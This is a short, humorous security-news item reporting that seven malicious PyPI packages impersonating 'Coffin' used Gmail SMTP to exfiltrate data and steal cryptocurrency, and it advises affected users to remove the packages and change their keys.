PyPi’s Malicious Package Fiasco: Coffin Conmen Strike Again!
Seven malicious PyPi packages were caught red-handed using Gmail’s SMTP servers for data exfiltration, with one notorious package downloaded over 18,000 times before being removed. These ‘Coffin’ packages impersonated a legitimate package but instead offered covert remote access and cryptocurrency theft. If installed, remove them pronto and change your keys!
Hot Take:
Who knew that PyPi packages could moonlight as cryptographic cat burglars? It seems that even the most innocuous-sounding code libraries have a knack for pulling off a digital heist. But hey, when Gmail’s SMTP server is your partner in crime, who needs a ski mask?
Key Points:
– Seven malicious PyPi packages were discovered using Gmail’s SMTP servers and WebSockets for nefarious deeds.
– These packages lingered on PyPi for up to four years, with one being downloaded over 18,000 times.
– The packages impersonated a legitimate ‘Coffin’ package, aiming at covert remote access and data exfiltration.
– The malware’s antics included email exfiltration, file transfer, and potential cryptocurrency theft.
– A related npm package, ‘crypto-encrypt-ts,’ also targeted cryptocurrency wallets, proving digital pickpocketing is in vogue.